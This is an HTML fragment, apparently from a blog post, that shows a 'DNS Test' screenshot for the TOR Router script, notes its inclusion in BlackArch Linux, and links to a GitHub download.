<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4uc1uooxomi0k4VJqu6cG6-IRhpkzcSOibqAmWlVcv24yILV-dwaMzRHw5d-T94da_hBkYNbwGldF-O_WHoE4MNO9HGaHGerguGbnnlDx6WJehAXXIuJWQBAKBRKJkUPZJ8J3T_SSnt9j/s1600/DNS+Test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="1365" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4uc1uooxomi0k4VJqu6cG6-IRhpkzcSOibqAmWlVcv24yILV-dwaMzRHw5d-T94da_hBkYNbwGldF-O_WHoE4MNO9HGaHGerguGbnnlDx6WJehAXXIuJWQBAKBRKJkUPZJ8J3T_SSnt9j/s640/DNS+Test.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Distros using the script</span></h3>
BlackArch Linux: <a href="https://github.com/BlackArch/blackarch/blob/master/packages/tor-router" target="_blank">https://github.com/BlackArch/blackarch/blob/master/packages/tor-router</a><br />
<br />
<span style="font-size: large;">Download <a href="https://github.com/Edu4rdSHL/tor-router/archive/master.zip" target="_blank">TOR Router</a></span></div>
Unknownnoreply@blogger.com0